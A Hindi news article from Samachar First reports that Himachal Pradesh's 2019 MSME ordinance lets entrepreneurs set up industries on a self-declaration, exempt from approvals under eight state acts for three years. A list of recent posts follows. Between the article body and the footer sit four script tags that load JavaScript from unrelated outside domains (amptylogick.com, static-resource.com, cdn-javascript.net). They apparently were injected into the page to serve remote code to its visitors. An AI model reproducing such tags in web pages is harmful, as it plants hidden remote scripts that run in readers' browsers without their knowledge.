Categories: हिमाचल

हिमाचल प्रदेश में सूक्ष्म, लघु और मध्यम उद्योग अध्यादेश लागू

<p>हिमाचल प्रदेश सूक्ष्म, लघु और मध्यम उद्योग (स्थापना और संचालन की सुविधा) अध्यादेश 2019, 6 नवम्बर से लागू कर दिया गया है, जिससे हजारों लघु उद्यमियों को राहत मिलेगी और यह प्रदेश एक आकर्षक निवेश गंतव्य बनेगा। इस अध्यदेश में आठ विभिन्न अधिनियमों को कवर किया गया है, जिसमें हिमाचल प्रदेश पंचायती राज एक्ट, 1994, हिमाचल प्रदेश नगर निगम अधिनियम, 1994, हिमाचल प्रदेश म्यूनिसिपल एक्ट, 1994, हिमाचल प्रदेश फायर फाईटिंग सर्विसेज एक्ट 1984, हिमाचल प्रदेश रोड साईड लैंड कंट्रोल एक्ट 1968, हिमाचल प्रदेश शॉप्स एंड कॉमर्शियल एस्टेबलिशमेंट एक्ट 1969, हिमाचल प्रदेश सोसाईटी रजिस्ट्रेशन एक्ट 2006 और हिमाचल प्रदेश टाउन एंड कंट्री प्लानिंग एक्ट, 1977 शामिल हैं।</p>

<p>इस अध्यादेश की यह विशेषता है कि जो उद्योगपति जो प्रदेश में अपना उद्योग आरम्भ करना चाहते हैं, को केवल घोषणा-पत्र देकर ही अपना उद्योग स्थापित कर सकेंगे। घोषणा-पत्र प्राप्त होते ही संबंधित नोडल अधिकारी जैसे महाप्रबंधक, जिला उद्योग केन्द्र/उप निदेशक उद्योग, एकल खिड़की निकासी संस्था, बद्दी/सदस्य सचिव, क्षेत्र के एकल खिड़की निकासी संस्था द्वारा पावती प्रमाणपत्र जारी किया जाएगा। प्रमाणपत्र प्राप्त होने के पश्चात उद्योगपति अगले तीन वर्ष के लिए बिना किसी स्वीकृति के अपना उद्योग शुरू कर सकते हैं।</p>

<p>उल्लेखनीय है कि प्रदेश में 99 प्रतिशत उद्योग, सूक्ष्म, लघु एवं मध्यम दर्जे के हैं। यह प्रदेश की अर्थव्यवस्था का स्तंभ है और इनमें लगभग 3.50 लाख लोगों को रोजगार उपलब्ध है। सरकार ने यह महसूस किया है कि प्रदेश में आय एवं रोजगार का स्तर बढ़ाने के लिए इन क्षेत्रों में अधिक से अधिक निवेश को आकर्षित करने की आवश्यकता है। प्रक्रियाओं को सरल बनाया जाना आवश्यक है, ताकि इच्छुक उद्यमियों को अनावश्यक परेशानियों से बचाया जा सके। सरकार द्वारा उठाए गए ये कदम प्रदेश में &lsquo;ईज़ ऑफ डुइंग बिजनैस&rsquo; की दिशा में मील-पथर साबित होंगे।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573095459632″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

7 mins ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

54 mins ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

1 hour ago

मस्जिद विवाद के बीच विक्रमादित्य की वक्फ बोर्ड में सुधार की नस‍ीहत

Shimla:हिमाचल और हिमाचलियत के हित सर्वश्रेष्ठ, सर्वत्र हिमाचल का संपूर्ण विकास। समय के साथ हर…

2 hours ago

कंगना का मंडी प्रेम: ‘यह मेरा घर है, यहां काम करूंगी

Manali: मशहूर अभिनेत्री कंगना रनौत ने  मनाली की यात्रा के दौरान अपने गृहनगर और लोगों…

2 hours ago

Survey: लेनदेन शुल्क लगा तो UPIका इस्तेमाल बंद कर देगे 75% उपयोगकर्ता

  New Delhi:लोकलसर्किल्स ने रविवार को एक सर्वेक्षण निष्कर्ष निकाला है। जिसमें दावा किया गया…

6 hours ago